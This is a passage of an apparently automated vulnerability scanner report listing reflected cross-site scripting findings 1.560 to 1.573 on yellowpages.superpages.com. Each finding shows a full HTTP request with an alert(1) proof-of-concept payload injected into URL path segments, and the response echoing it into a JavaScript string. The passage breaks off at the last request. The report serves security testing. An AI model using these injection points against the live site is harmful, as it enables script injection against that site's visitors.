GET /busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile41f5f&quot;-alert(1)-&quot;a4339366c19/js/photos.js
Server: Unspecified
Set-Cookie: JSESSIONID=FB668622B170916BD529AC461293019E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:04 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.560. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bda1"-alert(1)-"1e48a19052d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js9bda1&quot;-alert(1)-&quot;1e48a19052d/photos.js
Server: Unspecified
Set-Cookie: JSESSIONID=B2551730408681FE84948CBA5537D917; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:12 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.561. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aa7"-alert(1)-"ad045aaf68e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/photos.js92aa7&quot;-alert(1)-&quot;ad045aaf68e
Server: Unspecified
Set-Cookie: JSESSIONID=8B974E034538B797392AD6254625C8BF; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:22 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
lowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.562. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/script.more.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50c0b"-alert(1)-"1189d0fb19e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile50c0b&quot;-alert(1)-&quot;1189d0fb19e/script.more.js
Server: Unspecified
Set-Cookie: JSESSIONID=E9DAEB1458FBC9F0B5240D898F7B6C6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:21 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.563. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/script.more.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 696df"-alert(1)-"ae58cd1d73c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/script.more.js696df&quot;-alert(1)-&quot;ae58cd1d73c
Server: Unspecified
Set-Cookie: JSESSIONID=42E6EF654C25ED299F245617595471E5; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:30 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.564. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e37"-alert(1)-"a77217be230 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common27e37"-alert(1)-"a77217be230/css/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common27e37&quot;-alert(1)-&quot;a77217be230/css/forms.css
Server: Unspecified
Set-Cookie: JSESSIONID=DE3B6F76810C5748044659F1E3097E68; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common27e37"-alert(1)-"a77217be230/css/forms.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.565. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7342"-alert(1)-"107199becab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssf7342"-alert(1)-"107199becab/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssf7342&quot;-alert(1)-&quot;107199becab/forms.css
Server: Unspecified
Set-Cookie: JSESSIONID=65C38E08AACFCA247496A1F49E6DB041; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:36 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssf7342"-alert(1)-"107199becab/forms.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.566. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1c09"-alert(1)-"6f31add0046 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/forms.cssf1c09"-alert(1)-"6f31add0046 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/forms.cssf1c09&quot;-alert(1)-&quot;6f31add0046
Server: Unspecified
Set-Cookie: JSESSIONID=0B17752584FF1A2DC3811629C5253765; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:44 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/forms.cssf1c09"-alert(1)-"6f31add0046?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.567. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdca"-alert(1)-"96068b15aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common3fdca"-alert(1)-"96068b15aaf/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common3fdca&quot;-alert(1)-&quot;96068b15aaf/css/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=0CB998F802310503F3DF642089016142; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:00 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common3fdca"-alert(1)-"96068b15aaf/css/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.568. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef7bf"-alert(1)-"eed6ae6e6f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssef7bf&quot;-alert(1)-&quot;eed6ae6e6f1/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=BFEAD8CA936BB2E59BD56DAA6BF8F3D7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:07 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.569. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a006a"-alert(1)-"cbff4859ae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/print.cssa006a"-alert(1)-"cbff4859ae5 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/print.cssa006a&quot;-alert(1)-&quot;cbff4859ae5
Server: Unspecified
Set-Cookie: JSESSIONID=7112A7C7D0BF2A8F8F9AF1A7F814C733; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:16 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/print.cssa006a"-alert(1)-"cbff4859ae5?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.570. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1ff"-alert(1)-"dc2efa902dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonda1ff&quot;-alert(1)-&quot;dc2efa902dc/css/reset.css
Server: Unspecified
Set-Cookie: JSESSIONID=4239D7C1884951A967FFE5B24D2C2BFE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:21 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.571. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95a34"-alert(1)-"686e302e816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css95a34"-alert(1)-"686e302e816/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css95a34&quot;-alert(1)-&quot;686e302e816/reset.css
Server: Unspecified
Set-Cookie: JSESSIONID=7716BE18718FF0A9D0724AA014CD1180; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css95a34"-alert(1)-"686e302e816/reset.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.572. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aabb"-alert(1)-"23c3bf4d12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/reset.css3aabb"-alert(1)-"23c3bf4d12 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/reset.css3aabb&quot;-alert(1)-&quot;23c3bf4d12
Server: Unspecified
Set-Cookie: JSESSIONID=1ECBA4F29730F93048865C6330D8702E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:36 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/reset.css3aabb"-alert(1)-"23c3bf4d12?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.573. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15d"-alert(1)-"4cb99c62a1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

